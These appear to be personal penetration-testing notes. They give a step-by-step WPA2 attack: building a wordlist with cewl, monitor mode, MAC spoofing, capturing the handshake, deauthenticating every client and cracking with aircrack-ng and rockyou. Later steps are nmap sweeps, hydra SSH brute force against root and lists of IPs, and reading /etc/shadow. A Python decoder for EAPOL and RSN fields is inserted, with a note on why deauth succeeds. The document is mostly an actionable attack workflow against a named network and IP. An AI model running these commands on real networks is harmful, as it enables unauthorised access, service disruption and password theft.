- sudo apt install cewl
- cewl -d 1 -m 8 -w wordlist-d1m8-samecase.txt https://avengers.marvelhq.com/ (-d spider depth, -m minimum word length)
- cewl -d 1 -m 8 -w wordlist-d1m8-lowercase.txt https://avengers.marvelhq.com/ --lowercase
- cewl -d 2 -m 8 -w wordlist-d2m8-lowercase.txt https://avengers.marvelhq.com/ --lowercase
- cewl -d 1 -m 1 -w wordlist-d1m1-lowercase.txt https://avengers.marvelhq.com/ --lowercase
- cewl -d 1 -m 1 -w wordlist-d1m1-samecase.txt https://avengers.marvelhq.com/
- cewl -d 2 -m 1 -w wordlist-d2m1-lowercase.txt https://avengers.marvelhq.com/ --lowercase
- curl "https://avengers.marvelhq.com/" | sed 's/[^a-zA-Z ]/ /g' | tr 'A-Z ' 'a-z\n' | grep '[a-z]' | sort -u > wordlist.txt (same idea without cewl: one lowercase word per line, deduplicated)
- The shortest password allowed with WPA2 is 8 characters long
- sudo su
- echo | sudo -S
- iwconfig
- airmon-ng check kill
- airmon-ng
- airmon-ng start wlan0
- airmon-ng
- macchanger --mac 00:11:22:33:44:55 wlan0
- macchanger -s wlan0 (shows the current MAC, here 60:a4:b7:22:74:9f)
- airmon-ng start wlan0
- airodump-ng wlan0 (to retrieve the BSSID MAC address and channel)
- airodump-ng -c 1 -w file --bssid 48:29:52:46:92:CB wlan0
- aireplay-ng --deauth 1 -a 48:29:52:46:92:CB -c 60:a4:b7:22:74:9f wlan0
- aircrack-ng -w wordlist.txt file-01.cap
To retrieve the MAC ADDRESS, CHANNEL and ESSID use:
- sudo airodump-ng wlan0
- MAC => 48:29:52:46:92:CB
- CH => 1
- ESSID => Casa_wifi
- To check which stations are connected to the router:
- sudo airodump-ng -c 1 wlan0 -d 48:29:52:46:92:CB
- Specify the channel so that aireplay works correctly
- Run this first to capture packets, so the handshake is written to a file before deauthenticating everyone:
- sudo airodump-ng -w hacktest -c 1 --bssid 48:29:52:46:92:CB wlan0
- To force a deauth of everyone:
- sudo aireplay-ng --deauth 0 -a 48:29:52:46:92:CB wlan0
- Use hack01-01.cap to analyze in Wireshark: filter for eapol, which is the handshake protocol used to authenticate
- Check for the second message of the handshake in:
- 802.1X authentication
- WPA KEY DATA: 30140100000fac040100000fac040100000fac020c00
- the handshake packets are needed so that step 6 can try a bunch of passwords offline...
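The two fields the Wireshark step above inspects, decoded in Python as an added example (not from these notes): the EAPOL-Key Key Information word tells you which of the four handshake messages a frame is, and the RSN IE carried as WPA Key Data in message 2 tells you what cipher and AKM the client negotiated. The Key Data bytes are the ones from the notes; the Key Information values in the last line are constructed typical values.

```python
"""Decode two WPA2 handshake fields seen in Wireshark: the EAPOL-Key 'Key Information'
word (which of the 4 messages is this?) and the RSN IE that message 2 carries as 'WPA Key Data'."""
import struct

OUI_IEEE = bytes.fromhex("000fac")  # suite selectors defined by IEEE 802.11
CIPHERS = {2: "TKIP", 4: "CCMP-128", 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKMS = {1: "802.1X", 2: "PSK", 5: "802.1X-SHA256", 6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE"}

def handshake_message(key_info: int) -> int:
    """Map EAPOL-Key 'Key Information' flag bits to handshake message 1-4 (0 = not 4-way)."""
    pairwise, install = key_info & 0x0008, key_info & 0x0040
    ack, mic, secure = key_info & 0x0080, key_info & 0x0100, key_info & 0x0200
    if not pairwise:
        return 0                      # group-key handshake, not the 4-way
    if ack and not mic:
        return 1                      # AP -> STA: ANonce
    if mic and not ack and not secure:
        return 2                      # STA -> AP: SNonce + RSN IE (the frame the notes look for)
    if ack and mic and install:
        return 3                      # AP -> STA: GTK, install PTK
    if mic and secure and not ack:
        return 4                      # STA -> AP: confirmation
    return 0

def _suite(sel: bytes, table: dict) -> str:
    if sel[:3] != OUI_IEEE:           # 4-byte selector: 3-byte OUI + 1-byte type
        return f"vendor {sel[:3].hex()}:{sel[3]}"
    return table.get(sel[3], f"reserved({sel[3]})")

def parse_rsn_ie(ie: bytes) -> dict:
    """Parse an RSN information element (ID 0x30) into ciphers, AKMs and MFP flags."""
    if len(ie) < 12 or ie[0] != 0x30 or len(ie) != 2 + ie[1]:
        raise ValueError("not a complete RSN IE")
    body, off = ie[2:], 0
    version, = struct.unpack_from("<H", body, off); off += 2
    group = _suite(body[off:off + 4], CIPHERS); off += 4
    suites = []
    for table in (CIPHERS, AKMS):     # pairwise cipher list, then AKM list
        n, = struct.unpack_from("<H", body, off); off += 2
        if off + 4 * n > len(body): raise ValueError("suite list runs past the IE")
        suites.append([_suite(body[off + 4 * i:off + 4 * i + 4], table) for i in range(n)]); off += 4 * n
    caps = struct.unpack_from("<H", body, off)[0] if off + 2 <= len(body) else 0
    return {"version": version, "group": group, "pairwise": suites[0], "akm": suites[1],
            "mfp_capable": bool(caps & 0x0080), "mfp_required": bool(caps & 0x0040)}

KEY_DATA_MSG2 = bytes.fromhex("30140100000fac040100000fac040100000fac020c00")  # from the notes
if __name__ == "__main__":
    print(parse_rsn_ie(KEY_DATA_MSG2))   # CCMP/PSK, mfp_capable False: 802.11w is off
    print([handshake_message(k) for k in (0x008A, 0x010A, 0x13CA, 0x030A)])  # constructed -> [1, 2, 3, 4]
```

The RSN capabilities bits show whether management frame protection (802.11w) is negotiated; the notes' network reports neither MFP-capable nor MFP-required, which is the condition under which unprotected deauthentication frames are accepted.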
⚠️ we can skip steps 4 and 5 above and just try step 6; with luck it works ⚠️
- sudo aircrack-ng hack-01.cap -w wordlist.txt
- and the output should appear!
- sudo aircrack-ng hack01-01.cap -w /usr/share/wordlists/rockyou.txt
- systemctl start ssh.socket
- systemctl stop ssh.socket
- sudo airmon-ng stop wlan0
- sudo service NetworkManager restart
- iwconfig
- ifconfig
- sudo nmap -sP 192.168.15.0/24
- sudo nmap 192.168.15.0/24 -p 80,22 (-sP is a ping sweep only, now spelled -sn, and cannot be combined with -p)
- sudo nmap 192.168.0.* -p ssh --open
- sudo nmap 192.168.15.* --open
- ssh user@ipaddress
- hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.15.1 -t 4 ssh
- hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -M Documents/ip.txt -t 4 ssh
- -L file with a list of users, -M file with a list of target IPs
- sudo vim /var/www/html/index.html
- ls -l /etc/passwd => to see owner, first column name
- cat /etc/passwd => users
- cat /etc/shadow => users and password hash
Port   Transport  Protocol
22     TCP        SSH
5000   TCP        Helix Web Interface
3030   TCP        Helix Orchestrator
22443  TCP        Helix Hardware Monitor
1026   TCP        CEF Context Broker
27000  TCP        MongoDB
5050   TCP        Cygnus
1883   TCP        Eclipse-Mosquitto
4041   TCP        IoT Agent MQTT